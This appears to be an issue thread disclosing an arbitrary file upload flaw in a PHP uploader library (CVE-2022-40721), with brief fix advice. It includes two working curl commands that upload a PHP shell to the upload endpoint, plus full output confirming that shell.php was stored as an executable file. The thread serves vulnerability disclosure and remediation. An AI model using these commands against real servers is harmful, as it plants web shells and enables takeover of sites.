Arbitrary file uploads

[lcashdol]

By defaut, this code allows arbitrary file uploads to the web server's path. This will allow any unauthenticated user to upload a PHP file to the web server's path and execute it.

[bscript]

curl -vk site/[path]/default/php/ajax_upload_file.php -F "[email protected]" -F "files=b.php" -F "upload_dir=dir"

[lenamtl]

Hi,
Which solution did you use to prevent this?

[lcashdol]

You'd need to modify the code to either store uploaded files in a path not in the web root or filter what types of files are allowed to be uploaded.

[lenamtl]

So does setting the 'uploadDir' => null, for dir will prevent this when called directly?

protected $options = array(
        'limit' => null,
        'maxSize' => null,
        'extensions' => array('JPG', 'jpg'), 
        'required' => false, 
        'uploadDir' => null,
        'title' => array('auto', 10),
        'removeFiles' => true,
        'perms' => null,
        'replace' => true,
        'onCheck' => null,
        'onError' => null,
        'onSuccess' => null,
        'onUpload' => null,
        'onComplete' => null,
        'onRemove' => null
    );

And how this command can be run from the browser or how can I try to reproduce it so I can test the fix?

Thanks

[lcashdol]

I'd make the uploadDir /var/tmp

[lcashdol]

bscript's above exploit will work to test from the Linux command line.

[lcashdol]

My exploit looked like this:

$ curl -vk http://localhost/php-uploader/examples/upload.php -F "[email protected]"

• Trying ::1...
• TCP_NODELAY set
• Connected to localhost (::1) port 80 (#0)

POST /php-uploader/examples/upload.php HTTP/1.1
Host: localhost
User-Agent: curl/7.52.1
Accept: /
Content-Length: 9376
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------9acb3f20a7222918

< HTTP/1.1 100 Continue
< HTTP/1.1 200 OK
< Date: Tue, 20 Sep 2022 16:15:13 GMT
< Server: Apache/2.4.25 (Debian)
< Vary: Accept-Encoding
< Content-Length: 734
< Content-Type: text/html; charset=UTF-8
<
Array
(
[files] => Array
(
[0] => uploads/09ENdXG85W.php
)

[metas] => Array
    (
        [0] => Array
            (
                [date] => Tue, 20 Sep 2022 12:15:13 -0400
                [extension] => php
                [file] => uploads/09ENdXG85W.php
                [name] => 09ENdXG85W.php
                [old_name] => shell.php
                [replaced] => 
                [size] => 9174
                [size2] => 8.96 KB
                [type] => Array
                    (
                        [0] => application
                        [1] => octet-stream
                    )

            )

    )

)

• Curl_http_done: called premature == 0
• Connection #0 to host localhost left intact

[lcashdol]

I'm going to assign a CVEid of CVE-2022-40721 to track this.